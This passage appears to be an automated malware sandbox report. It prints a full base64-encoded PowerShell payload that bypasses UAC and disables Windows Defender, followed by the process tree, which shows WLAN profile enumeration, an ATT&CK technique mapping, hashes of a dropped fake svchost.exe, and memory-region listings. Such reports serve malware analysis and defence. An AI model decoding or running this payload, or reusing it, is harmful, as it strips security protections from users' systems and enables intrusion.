sAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3584

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
5⤵
- Launches sc.exe
PID:3124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
5⤵
PID:3456

C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" start TrustedInstaller
5⤵
PID:1776

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" start lsass
5⤵
PID:4048

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
4⤵
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\SysWOW64\chcp.com
chcp 65001
5⤵
PID:2192

C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
5⤵
PID:3144

C:\Windows\SysWOW64\findstr.exe
findstr All
5⤵
PID:1576

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
4⤵
PID:2308

C:\Windows\SysWOW64\chcp.com
chcp 65001
5⤵
PID:3432

C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
5⤵
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 4812
4⤵
- Program crash
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2312 -ip 2312
1⤵
PID:4076

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Bypass User Account Control

1

T1088

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

3

T1112

Disabling Security Tools

2

T1089

Bypass User Account Control

1

T1088

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
712a00a9d8164b3b6795c4e11800d2f1

SHA1
82952ef15a2e4e2b06cb149d3b206d11135128b5

SHA256
2a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052

SHA512
ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
21KB

MD5
0da34e75aae7dd4d6b3086aadb644268

SHA1
cc08bc635952cb66712cccbcbca3235ce5ccfe37

SHA256
12ee2969e7c65829c219bd2aed1a26b6dcbdf9a25991c508f13dacd25a8a1872

SHA512
6551684f37a5fc90f75e07176211d7e85bd99fed5723be6d9923a92607d2e2766e60ed735b8473ee84b7f12ee2f37213c91aa676caf2e234413380e4e9f76e95

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB3A5.tmp.bat
Filesize
151B

MD5
efe872352cc81bbe88312c51dffbb76c

SHA1
631f6c21912479bddbeeda336f741ac63cb048a8

SHA256
441dcb941b283021e4c89d62c8ec0f1f53951256a45ac7b80356bcdb9dccdc3f

SHA512
012bdb5686817af9e851a248bcdf19a25c96ee366c5ba058da527720fad848d7b7965e1d4c541871d4c8ad54a455f304b49f56f60754a64c3ddfe251a5370c15

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe
Filesize
415KB

MD5
0ee108a8e3b9cddad2cceb2648072fe2

SHA1
fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9

SHA256
4672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7

SHA512
1456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe
Filesize
415KB

MD5
0ee108a8e3b9cddad2cceb2648072fe2

SHA1
fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9

SHA256
4672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7

SHA512
1456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449

Download Submit
memory/208-141-0x0000000000000000-mapping.dmp

Download
memory/968-171-0x0000000000000000-mapping.dmp

Download
memory/1576-180-0x0000000000000000-mapping.dmp

Download
memory/1776-165-0x0000000000000000-mapping.dmp

Download
memory/2136-134-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/2136-133-0x00000000006E0000-0x0000000000715000-memory.dmp

Filesize
212KB

Download
memory/2136-136-0x0000000000777000-0x000000000079E000-memory.dmp

Filesize
156KB

Download
memory/2136-135-0x0000000004B70000-0x0000000005114000-memory.dmp

Filesize
5.6MB

Download
memory/2136-137-0x00000000006E0000-0x0000000000715000-memory.dmp

Filesize
212KB

Download
memory/2136-132-0x0000000000777000-0x000000000079E000-memory.dmp

Filesize
156KB

Download
memory/2192-178-0x0000000000000000-mapping.dmp

Download
memory/2308-181-0x0000000000000000-mapping.dmp

Download
memory/2312-148-0x0000000005F20000-0x0000000005FBC000-memory.dmp

Filesize
624KB

Download
memory/2312-146-0x000000000081B000-0x0000000000842000-memory.dmp

Filesize
156KB

Download
memory/2312-151-0x00000000071A0000-0x00000000071BE000-memory.dmp

Filesize
120KB

Download
memory/2312-149-0x0000000006340000-0x00000000063A6000-memory.dmp

Filesize
408KB

Download
memory/2312-150-0x0000000007100000-0x0000000007176000-memory.dmp

Filesize
472KB

Download
memory/2312-176-0x0000000007A40000-0x0000000007A4A000-memory.dmp

Filesize
40KB

Download
memory/2312-175-0x00000000075D0000-0x0000000007662000-memory.dmp

Filesize
584KB

Download
memory/2312-147-0x0000000000400000-0x000000000046C000-memory.dmp

Filesize
432KB

Download
memory/2312-143-0x0000000000000000-mapping.dmp

Download
memory/2392-164-0x0000000000000000-mapping.dmp

Download
memory/2924-177-0x0000000000000000-mapping.dmp

Download
memory/3124-162-0x0000000000000000-mapping.dmp

Download
memory/3144-179-0x0000000000000000-mapping.dmp

Download
memory/3188-167-0x0000000000000000-mapping.dmp

Download
memory/3432-182-0x0000000000000000-mapping.dmp

Download
memory/3456-163-0x0000000000000000-mapping.dmp

Download
memory/3476-138-0x0000000000000000-mapping.dmp

Download
memory/3496-173-0x0000000000000000-mapping.dmp

Download
memory/3584-158-0x0000000007AC0000-0x000000000813A000-memory.dmp

Filesize
6.5MB

Download
memory/3584-152-0x0000000000000000-mapping.dmp

Download
memory/3584-161-0x0000000007440000-0x0000000007462000-memory.dmp

Filesize
136KB

Download
memory/3584-153-0x00000000029A0000-0x00000000029D6000-memory.dmp

Filesize
216KB

Download
memory/3584-160-0x00000000074E0000-0x0000000007576000-memory.dmp

Filesize
600KB

Download
memory/3584-154-0x0000000005530000-0x0000000005B58000-memory.dmp

Filesize
6.2MB

Download
memory/3584-159-0x0000000007370000-0x000000000738A000-memory.dmp

Filesize
104KB

Download
memory/3584-155-0x00000000054E0000-0x0000000005502000-memory.dmp

Filesize
136KB

Download
memory/3584-157-0x00000000062B0000-0x00000000062CE000-memory.dmp

Filesize
120KB

Download
memory/3584-156-0x0000000005D00000-0x0000000005D66000-memory.dmp

Filesize
408KB

Download
memory/3744-174-0x0000000000000000-mapping.dmp

Download
memory/4004-170-0x0000000000000000-mapping.dmp

Download
memory/4048-166-0x0000000000000000-mapping.dmp

Download
memory/4436-172-0x0000000000000000-mapping.dmp

Download
memory/4548-183-0x0000000000000000-mapping.dmp

Download
memory/4608-142-0x0000000000000000-mapping.dmp

Download
memory/5036-139-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads